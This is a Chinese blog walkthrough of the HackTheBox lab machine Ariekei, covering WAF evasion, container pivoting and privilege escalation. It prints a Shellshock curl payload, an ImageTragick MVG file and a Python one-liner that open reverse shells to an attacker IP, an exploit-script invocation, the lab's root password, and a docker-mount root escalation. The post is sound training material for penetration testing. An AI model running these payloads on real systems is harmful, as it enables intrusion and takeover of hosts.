No.121-HackTheBox-Linux-Ariekei-Walkthrough渗透学习

最新推荐文章于 2024-08-23 16:53:34 发布
最新推荐文章于 2024-08-23 16:53:34 发布
阅读量508 收藏 1
点赞数 1
分类专栏: Hack The box 文章标签: python linux java 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34801745/article/details/106518266
版权

**

HackTheBox-Linux-Ariekei-Walkthrough

**

靶机地址:https://www.hackthebox.eu/home/machines/profile/115
靶机难度:高级(5.0/10)
靶机发布日期:2018年3月8日
靶机描述:
Ariekei is a complex machine focusing mainly on web application firewalls and pivoting techniques. This machine is by far one of the most challenging, requiring multiple escalations and container breakouts.

作者:大余
时间:2020-06-04

请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

在这里插入图片描述
可以看到靶机的IP是10.10.10.65…
在这里插入图片描述
Nmap发现了一个nginx服务器和两个运行不同版本的OpenSSH服务器,这表明系统上可能正在运行某种容器或虚拟环境…可能是服务于不同的网站…

在这里插入图片描述
正常页面访问提示正在维护…
在这里插入图片描述
在凭证发现了两个DNS域名…添加到hosts…
在这里插入图片描述
利用dirbuster爆破目录刚开始就报出了/cgi-bin/stats存在shellshock漏洞利用…
在这里插入图片描述
先访问该目录,这是一个shell脚本…提供了很多有用信息…
docroot设置用户的主目录: DOCUMENT_ROOT=/home/spanishdancer/content
后端服务器版本为:SERVER_SOFTWARE=Apache/2.2.22 (Debian)与我们在标头中实际获得的版本不同,应该使用了某种类型的反向代理或WAF等情况…
服务器的内部IP地址为:172.24.0.2…
在这里插入图片描述
命令:curl -k -H "User-Agent: () { :; }; /bin/eject" https://10.10.10.65/cgi-bin/stats
通过提示,直接利用shellshock漏洞攻击,发现一个表情符号,该表情符号将在我们尝试利用它时持续存在,应该是有一个Web应用程序防火墙在保护服务器免受攻击…(WAF)

在这里插入图片描述
访问两个域名,一个是Not Found报错,一个重定向回到了原始web页面…
挂着利用dirb和gobuster爆破目录发现都存在upload目录信息…下载upload一般文件上传利用了…GO
在这里插入图片描述
标题表明这是图像转换器,随意上传文件后没任何反应…
这里经过google查询,图像转换器可能容易受到Imagetragick的攻击,Imagetragick是ImageMagick库中较著名的利用方法之一…
在这里插入图片描述
可看到随意搜索Imagetragick攻击都能找到shell代码…利用即可
创建了mvg文件来利用此漏洞…
在这里插入图片描述

push graphic-context
viewbox 0 0 640 480
fill 'url(https://"|setsid /bin/bash -i >/dev/tcp/10.10.14.51/4444 0<&1 2>&1")'ms
pop graphic-context

通过简单一句话shell提权成功提权…root权限???
在这里插入图片描述
这里限制非常多,无法读取flag信息,先枚举吧…上传LinEnum
在这里插入图片描述
这里发现提权的这台是在Docker容器中,根据nmap扫描,应该是存在多台服务器情况…
下载的权限就在一个监狱当中,需要越狱突出重围的感觉…限制非常多,有WAF或者堡垒机等安全设备…
在这里插入图片描述
存在docker容器,mount -l查看挂载的文件,找到一个名为/common的目录…
在这里插入图片描述
在commin目录下存在很多子目录…里面存在很多很多提权开拓思路的信息…
这里发现了映射的信息…知道了服务器设备IP之间的映射关系
在这里插入图片描述
查看arp后,发现172.23.0.252,应该是WAF设备IP…
在这里插入图片描述
可以看到为容器设置了硬编码的root密码…
Container具有两个网络和两个IP 172.24.0.253和172.23.0.253,表明它是双宿主的…
主机上端口1022公开的SSH服务…NMAP也发现了…

在这里插入图片描述
继续找到.secrets的隐藏目录…找到名为bastion_key和bastion_key.pub文件…rsa密匙…ssh利用即可
在这里插入图片描述
直接利用ssh成功登陆…这里检查还是在docker容器中…
在这里插入图片描述
可以看到docker系统的IP地址…
在这里插入图片描述
前面文件上传提权查看到start.sh就知道了其中一些容器在实时网络和测试网络上都是双宿主的,目前所在的容器convert-live位于实时网络中,但bastion-live我们刚刚通过SSH登录的容器位于两者中…
这种网络布局的有趣之处在于,这waf-live是在端口443上向我们公开的设备,而它所做的就是在我们与blog-test容器之间路由流量,攻击stats脚本时看到的那些图像是通过生成waf-live枚举中的容器文件时看到的图像/common…
这是nginx.confin中的摘录waf-live,说明ModSecurity在充当WAF…ModSecurityEnabled on;ModSecurityConfig modsecurity.conf;
*
前面就知道在进行目录爆破扫描期间,找到了/cgi-bin/stats/目录容易受到shellshock的攻击,但是由于Web应用程序防火墙的原因无法利用它,由于waf-live在端口443和我们之间进行流量路由并在端口443上进行着,因此可以从服务器内部利用Shellshock漏洞…

二、提权

方法1:

利用EXP直接绕过WAF提权…
在这里插入图片描述
在这里插入图片描述
测试发现是存在可内部利用Shellshock漏洞…
为了避免受到保护,直接从此容器发起攻击即可,该容器可以通过另一个子网完全绕过waf…
在这里插入图片描述
命令:python 34900.py payload=reverse rhost=172.24.0.2 lhost=172.24.0.253 lport=1234 pages=/cgi-bin/stats
利用Shellshock漏洞可执行的34900_EXP进行提权…成功绕过进入了…获得了www-data权限…但这不是一个稳定的外壳…
目前信息收集中拥有Dockerfile中的密码root:Ib3!kTEvYw6*P7s,因此我们所要做的就是生成一个tty,直接就可以使用su进行root升级…
这里可以利用MSF的web_delivery生成tty,获得别的方式…自行尝试…
后续提权方法在方法2中演示…

方法2:

远程端口转发提权…
在这里插入图片描述
利用-L和-R进行端口转发…
在这里插入图片描述
可看到本地存在22端口…
这里只需利用ssh将8888在kali上启动,当从kali链接8888端口时,该链接就会转向堡垒机的22端口…
可看到成功端口转发8888端口到22…
然后进行ssh -p 8888 -i id_rsa 127.0.0.1成功本地登陆…
我们知道存在真实flag的服务器IP是172.24.0.2:80上…继续建桥
在这里插入图片描述
继续将9999端口转发到80,可看到本地已监听…
前面通过本地8888转发到堡垒22,现在将本地9999转发到真实服务80上…测试下

在这里插入图片描述
转发到了 https://10.10.10.65/cgi-bin/stats…
在这里插入图片描述
这里前面就知道不稳定外壳,我直接利用BP拦截注入了…
在这里插入图片描述
命令:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",端口));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
利用稳定外壳…shell

在这里插入图片描述
可以看到,我是将端口都转发到kali本地,利用Shellshock漏洞进行提权…但是提权需要在堡垒上进行NC监听获得外壳…
这里会出现非常多的不方便,需要继续转发到本地kali上做外壳…
在这里插入图片描述
直接转发即可…转发到了6666端口上…
当本地执行提权后,所有的流量都走端口转发到了我本地的机子上…
成功在本地获得反向外壳www低权用户…
在这里插入图片描述
通过前面信息收集在Dockerfile获取的root密匙,用python启动pty shell,然后su到root…获得了user_flag信息…

在这里插入图片描述
继续搜索隐藏目录,在本目录下找到.ssh的目录,找到三个文件authorized_keys,id_rsa和id_rsa.pub…存在RSA密钥…
在这里插入图片描述
保存到本地,进行破解…获得了密码…(跳过了简单操作,讲很多次了)
在这里插入图片描述
有密匙凭证+密码,直接ssh登陆…直接获得了spanishdancer用户权限外壳…
这里就直接进入用户了,不会通过waf和堡垒机的限制了…
在这里插入图片描述
这里靶机用户是docker容器状态,又在upload时知道Upload Image图像转换器…
直接检查了Docker映像…发现bash映像可利用…
在这里插入图片描述
https://fosterelli.co/privilege-escalation-via-docker.html
这有一篇文章介绍了docker images内核提权…
在这里插入图片描述
命令:docker run -it -v /:/opt bash bash
直接bash提权即可…获得了root权限…获得了root_flag信息…

信息收集+dir目录爆破+shellshock漏洞利用+文件上传提权+信息枚举分析+rsa密匙爆破提权+端口转发利用或EXP利用绕过堡垒机和防火墙+docker images内核提权…

这台靶机学到了很多很多思路想法,这台靶机主要思路非常广泛,需要搭桥需要跨越不然拿不到flag…
方法除了EXP和docker images内核提权方法没用过,其余都是非常熟悉的方法,学习新思路,加油!!!

由于我们已经成功得到root权限查看user和root.txt,因此完成这台高级的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

在这里插入图片描述

大余xiyou
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
net-snmp-5.3.2.2-5.el5.i386.zip
10-15
在5.3.2.2-5.el5.i386这个特定版本中,"el5"代表它兼容Red Hat Enterprise Linux 5,而“i386”表明这是为32位Intel架构设计的。这使得该版本可以在32位的Linux系统上有效运行,进行网络监控任务。 net-snmp的主要...
xamarin-forms-walkthrough:使用Xamarin.Forms创建的移动应用程序演练
02-06
WalkthroughApp是Xamarin.Forms应用程序,它使用和来演示无需要求自定义渲染器即可创建流畅而强大的Walkthrough的可能性。 支持平台: 安卓 的iOS 该项目使用某些第三方资产,其许可证要求提供署名: LottieFiles...
No.153-HackTheBox-Linux-Fortune-Walkthrough渗透学习
qq_34801745的博客
06-30 1777
** HackTheBox-Linux-Fortune-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/178 靶机难度:高级(5.0/10) 靶机发布日期:2019年5月21日 靶机描述: Fortune is an insane difficulty OpenBSD box which hosts a web app vulnerable to RCE. Using the RCE the CA key can be
No.150-HackTheBox-Linux-FluJab-Walkthrough渗透学习
qq_34801745的博客
06-28 2004
** HackTheBox-Linux-FluJab-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/170 靶机难度:高级(5.0/10) 靶机发布日期:2019年5月24日 靶机描述: FluJab is a hard difficulty Linux box with lot of components and needs a fair amount of enumeration. After gaining a
No.101-HackTheBox-Linux-Sneaky-Walkthrough渗透学习
qq_34801745的博客
05-16 917
** HackTheBox-Linux-Sneaky-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/19 靶机难度:中级(5.0/10) 靶机发布日期:2017年10月29日 靶机描述: Sneaky, while not requiring many steps to complete, can be difficult for some users. It explores enumeration through
No.151-HackTheBox-Linux-CTF-Walkthrough渗透学习
qq_34801745的博客
06-29 2189
** HackTheBox-Linux-CTF-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/172 靶机难度:高级(5.0/10) 靶机发布日期:2019年5月27日 靶机描述: CTF is an insane difficulty Linux box with a web application using LDAP based authentication. The application is vulnera
No.51-HackTheBox-windows-legacy-Walkthrough渗透学习
qq_34801745的博客
02-11 879
** VulnHub-hackNos: Os-hackNos-3-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines 靶机难度:容易(2.4/10) 靶机发布日期:2017年10月10日 靶机描述: Prepared By: Alexander Reid (Arrexel) Machine Author: ch4p Classif...
No.6-VulnHub-Lord Of The Root: 1.0.1-Walkthrough渗透学习
qq_34801745的博客
01-01 2126
** VulnHub-Lord Of The Root: 1.0.1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/lord-of-the-root-101,129/ 靶机难度:中等(CTF) 靶机发布日期:2015年9月23日 靶机描述:这是KoocSec为黑客练习准备的另一个Boot2Root挑战。他通过OSCP考试的启发准备了这一过程。它...
No.10-VulnHub-Stapler: 1-Walkthrough渗透学习
qq_34801745的博客
01-08 2223
** VulnHub-Stapler: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/stapler-1,150/ 靶机难度:中级(CTF) 靶机发布日期:2016年6月8日 靶机描述:Stapler is reported to be one of several vulnerable systems that are supposed ...
No.12-VulnHub-SickOs: 1.1-Walkthrough渗透学习
qq_34801745的博客
01-10 2945
** VulnHub-SkyTower: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/sickos-11,132/ 靶机难度:中级(CTF) 靶机发布日期:2015年12月11日 靶机描述:这个CTF明确地比喻了如何在网络上执行黑客策略,以在安全的环境中危害网络。 这个虚拟机与我在OSCP中遇到的实验室非常相似。 目的是破坏网络/计算机并...
No.8-VulnHub-IMF: 1-Walkthrough渗透学习
qq_34801745的博客
01-06 2768
** VulnHub-IMF: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用“ IMF”,这是我的第一个Boot2Root虚拟机。IMF是一个情报机构,您必须骇入所有标志并最终扎根。这些标志起步容易,随着您的前进而变得越来越难。每个标志...
No.39-VulnHub-Billy Madison: 1.1-Walkthrough渗透学习
qq_34801745的博客
02-01 3908
** VulnHub-Tommy Boy: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/tommy-boy-1,157/ 靶机难度:中级(CTF) 靶机发布日期:2016年7月27日 靶机描述: 圣施耐克!汤米男孩需要您的帮助! 卡拉汉汽车公司终于进入了现代技术领域,并建立了一个Web服务器供其客户订购刹车片。 不幸的是,该站点刚刚瘫痪,...
Metropolis-Hasting Random Walk.zip_Metropolis_Metropolis hasting
09-15
`Metropolis-Hasting Random Walk.docx`文档可能包含了一个使用MATLAB编写的Metropolis-Hastings算法示例。MATLAB是一种强大的编程环境,适合数值计算和数据分析,对于实现这种算法非常方便。 总的来说,Metropolis...
net-snmp-v5.8-el7.zip
05-31
rehdat el7和centos el7上的net-snmp版本为5.7,不支持snmpv3的AES-192和AES-256,net-snmp 5.8版本才支持,所以编译成rpm包。 先安装一些依赖: yum install -y perl-devel perl-ExtUtils-Embed elfutils-devel ...
net-snmp,snmpwalk(windows最新版本)
03-02
该工具是运行于windows平台的exe可执行文件,跟linux平台的snmpwalk功能类似,使用方法:cmd→cd到该exe文件的目录→snmpwalk.exe + option(通过snmpwalk.exe -h可以获得相关参数及运用方法,包括version、...
如何在Python中使用IP代理
最新发布
IPIPGO的博客
08-23 323
通过以上步骤,你应该已经学会了如何在Python中使用IP代理。无论是单个代理IP、带认证的代理IP,还是批量使用代理IP,这些方法都能帮助你在实际项目中灵活应用。希望这篇文章对你有所帮助,如果你有任何问题或建议,欢迎在评论区留言,我们会尽力为你解答。t=N7T8。
常见面试问题(Python)
jiao_mrswang的博客
08-23 96
5、GIL全局解释锁。
零基础学习人工智能—Python—Pytorch学习(六)
kiba518的博客
08-21 832
前言 本文主要讲神经网络的上半部分。 这篇文章开始有很多公式了,这些公式都很简单,但是如果是不经常在脑海里思考公式的人,那可能需要多花点时间做一下自我训练,个人感觉,也就几天时间,就能把自己感觉给调整出来。 习惯了公式看下面内容就会轻松很多,另外如果要深入学习人工智能,熟练的认知公式也是个必须的事情。 另外,我发现我前面文章写的有歧义的地方还是挺多,虽然,已经改了一部分,但,可能还有没发现的,大...
基于Python星载气溶胶数据处理与反演分析
lwjnlqiqi的博客
08-21 1146
Python星载气溶胶数据处理与反演分析
无线传感器网络:随机与定向步行的Top-k查询优化
文章介绍了两种新的查询方法:RWTQ(Random Walk Top-k Query)和DWTQ(Directed Walk Top-k Query)。RWTQ利用随机游走的方式进行数据收集,而DWTQ则采用了定向步行策略,旨在更快地到达高价值数据区域,同时考虑了...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值